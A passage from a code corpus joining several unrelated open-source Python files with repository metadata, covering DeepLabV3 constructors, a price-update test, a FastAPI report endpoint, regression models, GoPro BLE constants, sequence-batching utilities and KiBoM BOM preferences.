"""Constructs a DeepLabV3 model with a ResNet-101 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3', 'resnet101', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
def deeplabv3_mobilenet(num_classes=21, output_stride=8, pretrained_backbone=True, **kwargs):
"""Constructs a DeepLabV3 model with a MobileNetv2 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3', 'mobilenetv2', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
# Deeplab v3+
def deeplabv3plus_resnet50(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3 model with a ResNet-50 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3plus', 'resnet50', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
def deeplabv3plus_resnet101(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3+ model with a ResNet-101 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3plus', 'resnet101', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
def deeplabv3plus_mobilenet(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3+ model with a MobileNetv2 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3plus', 'mobilenetv2', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
| 40.540541
| 137
| 0.736333
|
2f9328eff5ba9eecd4ee4d5cef8d43bf8cbb4848
| 1,075
|
py
|
Python
|
mkt/prices/tests/test_utils.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/prices/tests/test_utils.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/prices/tests/test_utils.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
from StringIO import StringIO
from nose.tools import eq_
import amo.tests
from mkt.prices.models import Price, PriceCurrency
from mkt.prices.utils import update, update_from_csv
tiers = [
{'USD': '0.99', 'BRL': '1.99'},
# This row should be ignored, no tier of value 3.
{'USD': '3.00'},
# This row should be ignored, not US tier.
{'CAD': '10'}
]
csv = StringIO("""USD\tCAD\tBRL\n0.99\t1.99\t1.00""")
class TestUpdate(amo.tests.TestCase):
def setUp(self):
self.tier = Price.objects.create(name='1', price='0.99')
def test_create(self):
update(tiers)
eq_(str(PriceCurrency.objects.get(currency='BRL').price), '1.99')
assert not PriceCurrency.objects.filter(currency='CAD').exists()
def test_update(self):
PriceCurrency.objects.create(currency='BRL', tier=self.tier, price='2')
update(tiers)
eq_(str(PriceCurrency.objects.get(currency='BRL').price), '1.99')
def test_csv(self):
update_from_csv(csv)
assert PriceCurrency.objects.filter(currency='CAD').exists()
| 28.289474
| 79
| 0.654884
|
e134b4db1803380cbd4f9909d307d3ba012eee67
| 1,935
|
py
|
Python
|
fastapi/reportapi.py
|
fahadysf/fy-az-func-test
|
60cfd5dc2899a3ea0f960075f953dcc5f95f39c9
|
[
"MIT"
] | null | null | null |
fastapi/reportapi.py
|
fahadysf/fy-az-func-test
|
60cfd5dc2899a3ea0f960075f953dcc5f95f39c9
|
[
"MIT"
] | null | null | null |
fastapi/reportapi.py
|
fahadysf/fy-az-func-test
|
60cfd5dc2899a3ea0f960075f953dcc5f95f39c9
|
[
"MIT"
] | null | null | null |
import azure.functions as func
import fastapi
from fastapi.templating import Jinja2Templates
from .http_asgi import AsgiMiddleware
from .reports import gen_data
import xmltodict
import json
app = fastapi.FastAPI()
templates = Jinja2Templates(directory="./templates")
@app.get("/api/report/")
async def get_report_data(
request: fastapi.Request,
type: str,
customer_id: str,
edge_id: str,
timeframe: str = "15m",
format: str = "xml",
):
"""
Args:
type: {report type} possible-compromised-hosts
timeframe: {report time frame} options: 15m
customer_id: {customer bcrm ID}
edge_id: {customer edge ID}
format: {output format 'xml' or 'json'}
"""
context = {
"request": request,
"type": type,
"customer_id": customer_id,
"edge_id": edge_id,
"timeframe": timeframe,
}
# modern method of merging dicts (Python 3.9+ only)
context = context | gen_data(report_type=type)
if type == 'possible-compromised-hosts':
data = templates.TemplateResponse(
"possible-compromised-hosts.xml",
context, media_type='application/xml')
elif type == 'top-apps':
data = templates.TemplateResponse(
"top-apps.xml", context, media_type='application/xml')
else:
data = templates.TemplateResponse(
"shampoo.xml", {"request": request, "id": id},
media_type='application/xml')
# return fastapi.Response(content=data, media_type="application/xml")
if format == 'json':
jsondata = xmltodict.parse(data.body.decode('utf-8'))
data = fastapi.Response(content=json.dumps(
jsondata, indent=2, sort_keys=False), media_type='text/json')
return data
def main(req: func.HttpRequest, context: func.Context) -> func.HttpResponse:
return AsgiMiddleware(app).handle(req, context)
| 31.209677
| 76
| 0.636693
|
962ada4dd58c8d3fc911d6834cdf9620f56983aa
| 621
|
py
|
Python
|
torch_em/util/__init__.py
|
JonasHell/torch-em
|
2e008e0cd2f0ea6681581374fce4f9f47b986d55
|
[
"MIT"
] | 13
|
2021-03-09T21:31:09.000Z
|
2022-03-21T05:24:26.000Z
|
torch_em/util/__init__.py
|
JonasHell/torch-em
|
2e008e0cd2f0ea6681581374fce4f9f47b986d55
|
[
"MIT"
] | 16
|
2021-03-02T23:19:34.000Z
|
2022-03-25T19:43:41.000Z
|
torch_em/util/__init__.py
|
JonasHell/torch-em
|
2e008e0cd2f0ea6681581374fce4f9f47b986d55
|
[
"MIT"
] | 4
|
2021-05-18T08:29:33.000Z
|
2022-02-11T12:16:20.000Z
|
from .image import load_image, supports_memmap
from .modelzoo import (add_weight_formats,
convert_to_onnx,
convert_to_torchscript,
export_bioimageio_model,
export_parser_helper,
get_default_citations,
import_bioimageio_model)
from .reporting import get_training_summary
from .training import parser_helper
from .util import (ensure_array, ensure_spatial_array,
ensure_tensor, ensure_tensor_with_channels,
get_constructor_arguments, get_trainer)
| 44.357143
| 62
| 0.63124
|
017f59f5abbad366d108989ca80a6aed2d6c4cd4
| 8,594
|
py
|
Python
|
malt/models/regressor.py
|
uli-ai/malt
|
ad8120056a35ec306c7f3058310ca2034f18faa3
|
[
"MIT"
] | null | null | null |
malt/models/regressor.py
|
uli-ai/malt
|
ad8120056a35ec306c7f3058310ca2034f18faa3
|
[
"MIT"
] | null | null | null |
malt/models/regressor.py
|
uli-ai/malt
|
ad8120056a35ec306c7f3058310ca2034f18faa3
|
[
"MIT"
] | 1
|
2021-03-21T03:12:51.000Z
|
2021-03-21T03:12:51.000Z
|
# =============================================================================
# IMPORTS
# =============================================================================
import abc
import torch
# =============================================================================
# BASE CLASSES
# =============================================================================
class Regressor(torch.nn.Module, abc.ABC):
"""Base class for a regressor."""
def __init__(self, in_features, out_features, *args, **kwargs):
super(Regressor, self).__init__()
self.in_features = in_features
self.out_features = out_features
# =============================================================================
# KERNELS
# =============================================================================
class RBF(torch.nn.Module):
r""" A Gaussian Process Kernel that hosts parameters.
Note
----
l could be either of shape 1 or hidden dim
"""
def __init__(self, in_features, scale=0.0, variance=0.0, ard=True):
super(RBF, self).__init__()
if ard is True:
self.scale = torch.nn.Parameter(scale * torch.ones(in_features))
else:
self.scale = torch.nn.Parameter(torch.tensor(scale))
self.variance = torch.nn.Parameter(torch.tensor(variance))
def distance(self, x, x_):
""" Distance between data points. """
return torch.norm(x[:, None, :] - x_[None, :, :], p=2, dim=2)
def forward(self, x, x_=None):
""" Forward pass. """
# replicate x if there's no x_
if x_ is None:
x_ = x
# for now, only allow two dimension
assert x.dim() == 2
assert x_.dim() == 2
x = x * torch.exp(self.scale)
x_ = x_ * torch.exp(self.scale)
# (batch_size, batch_size)
distance = self.distance(x, x_)
# convariant matrix
# (batch_size, batch_size)
k = torch.exp(self.variance) * torch.exp(-0.5 * distance)
return k
# =============================================================================
# MODULE CLASSES
# =============================================================================
class NeuralNetworkRegressor(Regressor):
""" Regressor with neural network. """
def __init__(
self,
in_features: int = 128,
hidden_features: int = 128,
out_features: int = 2,
depth: int = 2,
activation: torch.nn.Module = torch.nn.ReLU(),
):
super(NeuralNetworkRegressor, self).__init__(
in_features=in_features, out_features=out_features
)
# bookkeeping
self.hidden_features = hidden_features
self.out_features = out_features
# neural network
modules = []
_in_features = in_features
for idx in range(depth - 1):
modules.append(torch.nn.Linear(_in_features, hidden_features))
modules.append(activation)
_in_features = hidden_features
modules.append(torch.nn.Linear(hidden_features, out_features))
self.ff = torch.nn.Sequential(*modules)
def forward(self, x):
return self.ff(x)
class ExactGaussianProcessRegressor(Regressor):
epsilon = 1e-7
def __init__(
self,
in_features: int=128,
out_features: int=2,
kernel_factory: torch.nn.Module = RBF,
log_sigma: float=-3.0,
):
assert out_features == 2
super(ExactGaussianProcessRegressor, self).__init__(
in_features=in_features, out_features=out_features,
)
# construct kernel
self.kernel = kernel_factory(
in_features=in_features,
)
self.in_features = in_features
self.log_sigma = torch.nn.Parameter(
torch.tensor(log_sigma),
)
def _get_kernel_and_auxiliary_variables(
self, x_tr, y_tr, x_te=None,
):
""" Get kernel and auxiliary variables for forward pass. """
# compute the kernels
k_tr_tr = self._perturb(self.kernel.forward(x_tr, x_tr))
if x_te is not None: # during test
k_te_te = self._perturb(self.kernel.forward(x_te, x_te))
k_te_tr = self._perturb(self.kernel.forward(x_te, x_tr))
# k_tr_te = self.forward(x_tr, x_te)
k_tr_te = k_te_tr.t() # save time
else: # during train
k_te_te = k_te_tr = k_tr_te = k_tr_tr
# (batch_size_tr, batch_size_tr)
k_plus_sigma = k_tr_tr + torch.exp(self.log_sigma) * torch.eye(
k_tr_tr.shape[0], device=k_tr_tr.device
)
# (batch_size_tr, batch_size_tr)
l_low = torch.cholesky(k_plus_sigma)
l_up = l_low.t()
# (batch_size_tr. 1)
l_low_over_y, _ = torch.triangular_solve(
input=y_tr, A=l_low, upper=False
)
# (batch_size_tr, 1)
alpha, _ = torch.triangular_solve(
input=l_low_over_y, A=l_up, upper=True
)
return k_tr_tr, k_te_te, k_te_tr, k_tr_te, l_low, alpha
def condition(self, x_te, *args, x_tr=None, y_tr=None, **kwargs):
r""" Calculate the predictive distribution given `x_te`.
Note
----
Here we allow the speicifaction of sampler but won't actually
use it here in this version.
Parameters
----------
x_te : `torch.Tensor`, `shape=(n_te, hidden_dimension)`
Test input.
x_tr : `torch.Tensor`, `shape=(n_tr, hidden_dimension)`
(Default value = None)
Training input.
y_tr : `torch.Tensor`, `shape=(n_tr, 1)`
(Default value = None)
Test input.
sampler : `torch.optim.Optimizer` or `pinot.Sampler`
(Default value = None)
Sampler.
Returns
-------
distribution : `torch.distributions.Distribution`
Predictive distribution.
"""
# get parameters
(
k_tr_tr,
k_te_te,
k_te_tr,
k_tr_te,
l_low,
alpha,
) = self._get_kernel_and_auxiliary_variables(x_tr, y_tr, x_te)
# compute mean
# (batch_size_te, 1)
mean = k_te_tr @ alpha
# (batch_size_tr, batch_size_te)
v, _ = torch.triangular_solve(input=k_tr_te, A=l_low, upper=False)
# (batch_size_te, batch_size_te)
variance = k_te_te - v.t() @ v
# ensure symetric
variance = 0.5 * (variance + variance.t())
# $ p(y|X) = \int p(y|f)p(f|x) df $
# variance += torch.exp(self.log_sigma) * torch.eye(
# *variance.shape,
# device=variance.device)
# construct noise predictive distribution
distribution = torch.distributions.multivariate_normal.MultivariateNormal(
mean.flatten(), variance
)
return distribution
def _perturb(self, k):
"""Add small noise `epsilon` to the diagonal of covariant matrix.
Parameters
----------
k : `torch.Tensor`, `shape=(n_data_points, n_data_points)`
Covariant matrix.
Returns
-------
k : `torch.Tensor`, `shape=(n_data_points, n_data_points)`
Preturbed covariant matrix.
"""
# introduce noise along the diagonal
noise = self.epsilon * torch.eye(*k.shape, device=k.device)
return k + noise
def loss(self, x_tr, y_tr, *args, **kwargs):
r""" Compute the loss.
Note
----
Defined to be negative Gaussian likelihood.
Parameters
----------
x_tr : `torch.Tensor`, `shape=(n_training_data, hidden_dimension)`
Input of training data.
y_tr : `torch.Tensor`, `shape=(n_training_data, 1)`
Target of training data.
Returns
-------
nll : `torch.Tensor`, `shape=(,)`
Negative log likelihood.
"""
# point data to object
self._x_tr = x_tr
self._y_tr = y_tr
# get the parameters
(
k_tr_tr,
k_te_te,
k_te_tr,
k_tr_te,
l_low,
alpha,
) = self._get_kernel_and_auxiliary_variables(x_tr, y_tr)
import math
# we return the exact nll with constant
nll = (
0.5 * (y_tr.t() @ alpha)
+ torch.trace(l_low)
+ 0.5 * y_tr.shape[0] * math.log(2.0 * math.pi)
)
return nll
| 29.431507
| 82
| 0.520363
|
7cd063e2786c7e403985ccca5f3856155102aba4
| 7,367
|
py
|
Python
|
demos/python/sdk_wireless_camera_control/open_gopro/constants.py
|
matteo-pupa/OpenGoPro
|
bdb47b0451c394f0ae07023c4f342c75317d73d4
|
[
"MIT"
] | null | null | null |
demos/python/sdk_wireless_camera_control/open_gopro/constants.py
|
matteo-pupa/OpenGoPro
|
bdb47b0451c394f0ae07023c4f342c75317d73d4
|
[
"MIT"
] | null | null | null |
demos/python/sdk_wireless_camera_control/open_gopro/constants.py
|
matteo-pupa/OpenGoPro
|
bdb47b0451c394f0ae07023c4f342c75317d73d4
|
[
"MIT"
] | null | null | null |
# constants.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Wed, Sep 1, 2021 5:05:44 PM
"""Constant numbers shared across the GoPro module. These do not change across Open GoPro Versions"""
from enum import Enum, EnumMeta
from typing import Union, Tuple, Iterator, Type, TypeVar
import construct
from open_gopro.ble import UUID
T = TypeVar("T")
GOPRO_BASE_UUID = "b5f9{}-aa8d-11e3-9046-0002a5d5c51b"
class GoProEnumMeta(EnumMeta):
"""Modify enum metaclass to build GoPro specific enums"""
ITER_SKIP_NAMES = ["NOT_APPLICABLE"]
def __iter__(cls: Type[T]) -> Iterator[T]:
"""Do not return enum values whose name is in the ITER_SKIP_NAMES list
Returns:
Iterator[T]: enum iterator
"""
return iter([x[1] for x in cls._member_map_.items() if x[0] not in GoProEnumMeta.ITER_SKIP_NAMES]) # type: ignore
class GoProEnum(Enum, metaclass=GoProEnumMeta):
"""GoPro specific enum to be used for all settings, statuses, and parameters
The name NOT_APPLICABLE is special as it will not be returned as part of the enum iterator
"""
class ErrorCode(GoProEnum):
"""Status Codes."""
SUCCESS = 0
ERROR = 1
INVALID_PARAM = 2
class CmdId(GoProEnum):
"""Command ID's that are written to UUID.CQ_COMMAND."""
SET_SHUTTER = 0x01
POWER_DOWN = 0x04
SLEEP = 0x05
SET_PAIRING_COMPLETE = 0x03
GET_CAMERA_SETTINGS = 0x12
GET_CAMERA_STATUSES = 0x13
SET_WIFI = 0x17
GET_SETTINGS_JSON = 0x3B
GET_HW_INFO = 0x3C
LOAD_PRESET_GROUP = 0x3E
LOAD_PRESET = 0x40
SET_THIRD_PARTY_CLIENT_INFO = 0x50
GET_THIRD_PARTY_API_VERSION = 0x51
SET_TURBO_MODE = 0xF1
GET_PRESET_STATUS = 0xF5
class ActionId(GoProEnum):
"""Action ID's that identify a protobuf command."""
SET_TURBO_MODE = 0x6B
GET_PRESET_STATUS = 0x02
class SettingId(GoProEnum):
"""Setting ID's that identify settings and are written to UUID.CQ_SETTINGS."""
RESOLUTION = 2
FPS = 3
INTERNAL_5 = 5
INTERNAL_6 = 6
INTERNAL_13 = 13
INTERNAL_19 = 19
INTERNAL_24 = 24
INTERNAL_30 = 30
INTERNAL_31 = 31
INTERNAL_32 = 32
INTERNAL_37 = 37
INTERNAL_41 = 41
INTERNAL_42 = 42
INTERNAL_43 = 43
INTERNAL_44 = 44
INTERNAL_45 = 45
INTERNAL_47 = 47
INTERNAL_48 = 48
INTERNAL_54 = 54
AUTO_OFF = 59
INTERNAL_60 = 60
INTERNAL_61 = 61
INTERNAL_62 = 62
INTERNAL_64 = 64
INTERNAL_65 = 65
INTERNAL_66 = 66
INTERNAL_67 = 67
INTERNAL_68 = 68
INTERNAL_69 = 69
INTERNAL_75 = 75
INTERNAL_76 = 76
INTERNAL_79 = 79
INTERNAL_83 = 83
INTERNAL_84 = 84
INTERNAL_85 = 85
INTERNAL_86 = 86
INTERNAL_87 = 87
INTERNAL_88 = 88
LED = 91
INTERNAL_96 = 96
INTERNAL_102 = 102
INTERNAL_103 = 103
INTERNAL_104 = 104
INTERNAL_105 = 105
INTERNAL_106 = 106
INTERNAL_111 = 111
INTERNAL_112 = 112
INTERNAL_114 = 114
INTERNAL_115 = 115
INTERNAL_116 = 116
INTERNAL_117 = 117
INTERNAL_118 = 118
VIDEO_FOV = 121
PHOTO_FOV = 122
MULTI_SHOT_FOV = 123
INTERNAL_124 = 124
INTERNAL_125 = 125
INTERNAL_126 = 126
INTERNAL_128 = 128
SHORTCUT_LOWER_LEFT = 129
SHORTCUT_LOWER_RIGHT = 130
SHORTCUT_UPPER_LEFT = 131
SHORTCUT_UPPER_RIGHT = 132
INTERNAL_133 = 133
INTERNAL_134 = 134
INTERNAL_135 = 135
INTERNAL_139 = 139
INTERNAL_144 = 144
INTERNAL_145 = 145
INTERNAL_146 = 146
INTERNAL_147 = 147
INTERNAL_148 = 148
INTERNAL_149 = 149
INTERNAL_153 = 153
INTERNAL_154 = 154
INTERNAL_155 = 155
INTERNAL_156 = 156
INTERNAL_157 = 157
INTERNAL_158 = 158
INTERNAL_159 = 159
INTERNAL_160 = 160
INTERNAL_161 = 161
MAX_LENS_MOD = 162
INTERNAL_163 = 163
INTERNAL_164 = 164
INTERNAL_165 = 165
INTERNAL_166 = 166
INTERNAL_167 = 167
INTERNAL_168 = 168
INTERNAL_169 = 169
INVALID_FOR_TESTING = 0xFF
class QueryCmdId(GoProEnum):
"""Command ID that is written to UUID.CQ_QUERY."""
GET_SETTING_VAL = 0x12
GET_STATUS_VAL = 0x13
GET_SETTING_NAME = 0x22
GET_CAPABILITIES_VAL = 0x32
GET_CAPABILITIES_NAME = 0x42
REG_SETTING_VAL_UPDATE = 0x52
REG_STATUS_VAL_UPDATE = 0x53
REG_CAPABILITIES_UPDATE = 0x62
UNREG_SETTING_VAL_UPDATE = 0x72
UNREG_STATUS_VAL_UPDATE = 0x73
UNREG_CAPABILITIES_UPDATE = 0x82
SETTING_VAL_PUSH = 0x92
STATUS_VAL_PUSH = 0x93
SETTING_CAPABILITY_PUSH = 0xA2
INVALID_FOR_TESTING = 0xFF
class StatusId(GoProEnum):
"""Status ID to identify statuses sent to UUID.CQ_QUERY or received from UUID.CQ_QUERY_RESP."""
BATT_PRESENT = 1
BATT_LEVEL = 2
EXT_BATT_PRESENT = 3
EXT_BATT_LEVEL = 4
SYSTEM_HOT = 6
SYSTEM_BUSY = 8
QUICK_CAPTURE = 9
ENCODING = 10
LCD_LOCK_ACTIVE = 11
VIDEO_PROGRESS = 13
INTERNAL_14 = 14
WIRELESS_ENABLED = 17
PAIR_STATE = 19
PAIR_TYPE = 20
PAIR_TIME = 21
WAP_SCAN_STATE = 22
WAP_SCAN_TIME = 23
WAP_PROV_STAT = 24
REMOTE_CTRL_VER = 26
REMOTE_CTRL_CONN = 27
PAIR_STATE2 = 28
WLAN_SSID = 29
AP_SSID = 30
APP_COUNT = 31
PREVIEW_ENABLED = 32
SD_STATUS = 33
PHOTOS_REM = 34
VIDEO_REM = 35
NUM_GROUP_PHOTO = 36
NUM_GROUP_VIDEO = 37
NUM_TOTAL_PHOTO = 38
NUM_TOTAL_VIDEO = 39
DATE_TIME = 40
OTA_STAT = 41
DOWNLAD_CANCEL_PEND = 42
MODE_GROUP = 43
LOCATE_ACTIVE = 45
INTERNAL_46 = 46
INTERNAL_47 = 47
INTERNAL_48 = 48
MULTI_COUNT_DOWN = 49
SPACE_REM = 54
STREAMING_SUPP = 55
WIFI_BARS = 56
CURRENT_TIME_MS = 57
NUM_HILIGHTS = 58
LAST_HILIGHT = 59
NEXT_POLL = 60
ANALYTICS_RDY = 61
ANALYTICS_SIZE = 62
IN_CONTEXT_MENU = 63
TIMELAPSE_REM = 64
EXPOSURE_TYPE = 65
EXPOSURE_X = 66
EXPOSURE_Y = 67
GPS_STAT = 68
AP_STATE = 69
INT_BATT_PER = 70
ACC_MIC_STAT = 74
DIGITAL_ZOOM = 75
WIRELESS_BAND = 76
DIG_ZOOM_ACTIVE = 77
MOBILE_VIDEO = 78
FIRST_TIME = 79
SEC_SD_STAT = 80
BAND_5GHZ_AVAIL = 81
SYSTEM_READY = 82
BATT_OK_OTA = 83
CAPTURE_DELAY = 84
VIDEO_LOW_TEMP = 85
ORIENTATION = 86
THERMAL_MIT_MODE = 87
ZOOM_ENCODING = 88
FLATMODE_ID = 89
INTERNAL_90 = 90
LOGS_READY = 91
TIMEWARP_1X_ACTIVE = 92
VIDEO_PRESETS = 93
PHOTO_PRESETS = 94
TIMELAPSE_PRESETS = 95
PRESETS_GROUP = 96
ACTIVE_PRESET = 97
PRESET_MODIFIED = 98
LIVE_BURST_REM = 99
LIVE_BURST_TOTAL = 100
CAPT_DELAY_ACTIVE = 101
MEDIA_MOD_MIC_STAT = 102
TIMEWARP_SPEED_RAMP = 103
LINUX_CORE_ACTIVE = 104
CAMERA_LENS_TYPE = 105
VIDEO_HINDSIGHT = 106
SCHEDULED_PRESET = 107
SCHEDULED_CAPTURE = 108
CREATING_PRESET = 109
MEDIA_MOD_STAT = 110
SD_RATING_CHECK_ERROR = 111
SD_WRITE_SPEED_ERROR = 112
TURBO_MODE = 113
CAMERA_CONTROL = 114
USB_CONNECTED = 115
ProducerType = Tuple[QueryCmdId, Union[SettingId, StatusId]]
"""Types that can be registered for."""
CmdType = Union[CmdId, QueryCmdId, ActionId]
"""Types that identify a command."""
ResponseType = Union[CmdType, StatusId, SettingId, UUID, str, construct.Enum]
"""Types that are used to identify a response."""
| 24.313531
| 122
| 0.674223
|
a812c1e18b4dd190c316c467d60571cf515a8e65
| 5,360
|
py
|
Python
|
nnlib/utils/batching.py
|
huzecong/nnlib
|
fd68abc51028444ce7c789642e2a7b8ed1853255
|
[
"MIT"
] | 1
|
2019-01-08T03:55:23.000Z
|
2019-01-08T03:55:23.000Z
|
nnlib/utils/batching.py
|
huzecong/nnlib
|
fd68abc51028444ce7c789642e2a7b8ed1853255
|
[
"MIT"
] | null | null | null |
nnlib/utils/batching.py
|
huzecong/nnlib
|
fd68abc51028444ce7c789642e2a7b8ed1853255
|
[
"MIT"
] | null | null | null |
from typing import List, Sequence, Tuple, TypeVar, overload, Iterator
import numpy as np
from nnlib.torch import *
from nnlib.utils.iterable import MeasurableGenerator
from nnlib.utils.math import ceil_div
__all__ = ['minibatches_from', 'pad_sequences', 'batch_sequences', 'shift_packed_seq', 'mask_dropout_embeddings']
T = TypeVar('T')
def _minibatches_from(data: List[T], size: int = 16, shuffle: bool = True,
different_size: bool = False) -> Iterator[List[T]]:
length = len(data)
if shuffle:
idxs = np.random.permutation(ceil_div(length, size)) * size
else:
idxs = np.arange(ceil_div(length, size)) * size
for idx in idxs:
if not different_size and idx + size > length:
batch = list(data[-size:])
else:
batch = list(data[idx:(idx + size)])
yield batch
def minibatches_from(data: List[T], size: int = 16, shuffle: bool = True,
different_size: bool = False) -> Iterator[List[T]]:
r"""
A low-level API to directly create mini-batches from a list.
:param data: Data to create mini-batches for.
:param size: Batch size.
:param shuffle: Whether to shuffle data.
:param different_size: If ``True``, allows the final batch to have different size than specified batch size.
If ``False``, extra elements from end of array will be appended.
:return: A generator yielding one batch at a time.
"""
generator = _minibatches_from(data, size, shuffle, different_size)
length = ceil_div(len(data), size)
return MeasurableGenerator(generator, length)
def pad_sequences(seqs: List[List[int]], batch_first: bool = False, pad: int = -1) -> LongTensor:
r"""
A wrapper around :func:`nn.utils.rnn.pad_sequence` that takes a list of lists, and converts it into a list of
:class:`torch.LongTensor`\ s.
"""
tensor_seqs = [torch.tensor(seq, dtype=torch.long) for seq in seqs]
return nn.utils.rnn.pad_sequence(tensor_seqs, batch_first=batch_first, padding_value=pad)
@overload
def batch_sequences(seqs: Sequence[Sequence[T]], ordered: bool) -> PackedSequence: ...
@overload
def batch_sequences(seqs: Sequence[Sequence[T]], extra_seq1: Sequence, *extra_seqs: Sequence, ordered: bool) \
-> Tuple[PackedSequence, Tuple[Sequence, ...]]: ...
def batch_sequences(seqs, *extra_seqs, ordered=False):
r"""
Given a batch from data loader, convert it into PyTorch :class:`PackedSequence`.
Since :class:`PackedSequence` requires sequences to be sorted in reverse order of their length, batch elements are
reordered. If batch contains other data apart from the sequence (e.g. labels), pass them in ``*args`` to allow
consistent reordering.
:param seqs: The sequences.
:param extra_seqs: Other data to be reordered.
:param ordered: If true, assume (and check) that the sequences are already sorted in decreasing length.
:param pack: If true, return a PackedSequence, otherwise return a Tensor.
"""
indices = sorted(range(len(seqs)), key=lambda idx: len(seqs[idx]), reverse=True)
if ordered and indices != list(range(len(seqs))):
raise ValueError("Sentences are not sorted in decreasing length while specifying `ordered=True`")
tensor_seqs = [torch.tensor(seqs[idx], dtype=torch.long) for idx in indices]
reordered_args = tuple([xs[idx] for idx in indices] for xs in extra_seqs)
packed_seq: PackedSequence = nn.utils.rnn.pack_padded_sequence(
nn.utils.rnn.pad_sequence(tensor_seqs, padding_value=-1), [len(seq) for seq in tensor_seqs])
if len(reordered_args) > 0:
return packed_seq, reordered_args
return packed_seq
def shift_packed_seq(seq: PackedSequence, start: int = 0) -> PackedSequence:
r"""
Shifts the :class:`PackedSequence`, i.e. return the substring starting from ``start``.
:param seq: The sequence to truncate.
:param start: The left endpoint of truncate range. Supports Python indexing syntax (negative for counting
from the end).
:return: Truncated sequence.
"""
data = seq.data
batch_sizes = seq.batch_sizes
return PackedSequence(data[sum(batch_sizes[:start]):], batch_sizes[start:])
def mask_dropout_embeddings(strs: Sequence[Sequence[T]], dropout_prob: float, transposed: bool = False) -> np.ndarray:
r"""
Generate mask for embedding dropout, each word type is either dropped out as a whole
or scaled according to the dropout probability.
:param strs: Un-transposed sentence batch.
:param dropout_prob: Token dropout probability.
:param transposed: Whether to return transposed mask (i.e. batch_size * length)
:return: The generated mask.
"""
words = set([w for s in strs for w in s])
dropout = dict(zip(words, np.random.binomial(1, 1 - dropout_prob, len(words))))
if transposed:
mask = np.full((len(strs), len(strs[0])), 1 / (1 - dropout_prob), dtype=np.bool)
for i in range(len(strs)):
for j, w in enumerate(strs[i]):
mask[i, j] = dropout[w]
else:
max_len = (max(len(s) for s in strs))
mask = np.full((max_len, len(strs)), 1 / (1 - dropout_prob), dtype=np.bool)
for idx, s in enumerate(strs):
mask[:len(s), idx] = [dropout[w] for w in s]
# inverse dropout
return mask
| 42.204724
| 118
| 0.678545
|
ba43d63725b77c82c530e41f1a378c77b39ed222
| 16,608
|
py
|
Python
|
kibom/preferences.py
|
n0dyjeff/KiBoM
|
0ce83c2549eb303405c63a1f9538d42ebd75dbb5
|
[
"MIT"
] | null | null | null |
kibom/preferences.py
|
n0dyjeff/KiBoM
|
0ce83c2549eb303405c63a1f9538d42ebd75dbb5
|
[
"MIT"
] | null | null | null |
kibom/preferences.py
|
n0dyjeff/KiBoM
|
0ce83c2549eb303405c63a1f9538d42ebd75dbb5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
import re
import os
from .columns import ColumnList
from . import debug
# Check python version to determine which version of ConfirParser to import
if sys.version_info.major >= 3:
import configparser as ConfigParser
else:
import ConfigParser
class BomPref:
SECTION_IGNORE = "IGNORE_COLUMNS"
SECTION_COLUMN_ORDER = "COLUMN_ORDER"
SECTION_GENERAL = "BOM_OPTIONS"
SECTION_ALIASES = "COMPONENT_ALIASES"
SECTION_GROUPING_FIELDS = "GROUP_FIELDS"
SECTION_REGEXCLUDES = "REGEX_EXCLUDE"
SECTION_REGINCLUDES = "REGEX_INCLUDE"
SECTION_JOIN = "JOIN" # (#81)
OPT_DIGIKEY_LINK = "digikey_link"
OPT_PCB_CONFIG = "pcb_configuration"
OPT_NUMBER_ROWS = "number_rows"
OPT_GROUP_CONN = "group_connectors"
OPT_USE_REGEX = "test_regex"
OPT_USE_ALT = "use_alt"
OPT_MERGE_BLANK = "merge_blank_fields"
OPT_IGNORE_DNF = "ignore_dnf"
OPT_GENERATE_DNF = "html_generate_dnf"
OPT_BACKUP = "make_backup"
OPT_OUTPUT_FILE_NAME = "output_file_name"
OPT_VARIANT_FILE_NAME_FORMAT = "variant_file_name_format"
OPT_DEFAULT_BOARDS = "number_boards"
OPT_DEFAULT_PCBCONFIG = "board_variant"
OPT_CONFIG_FIELD = "fit_field"
OPT_HIDE_HEADERS = "hide_headers"
OPT_HIDE_PCB_INFO = "hide_pcb_info"
OPT_REF_SEPARATOR = "ref_separator"
def __init__(self):
# List of headings to ignore in BoM generation
self.ignore = [
ColumnList.COL_PART_LIB,
ColumnList.COL_FP_LIB,
ColumnList.COL_SHEETPATH,
]
self.corder = ColumnList._COLUMNS_DEFAULT
self.useAlt = False # Use alternate reference representation
self.ignoreDNF = True # Ignore rows for do-not-fit parts
self.generateDNF = True # Generate a list of do-not-fit parts
self.numberRows = True # Add row-numbers to BoM output
self.groupConnectors = True # Group connectors and ignore component value
self.useRegex = True # Test various columns with regex
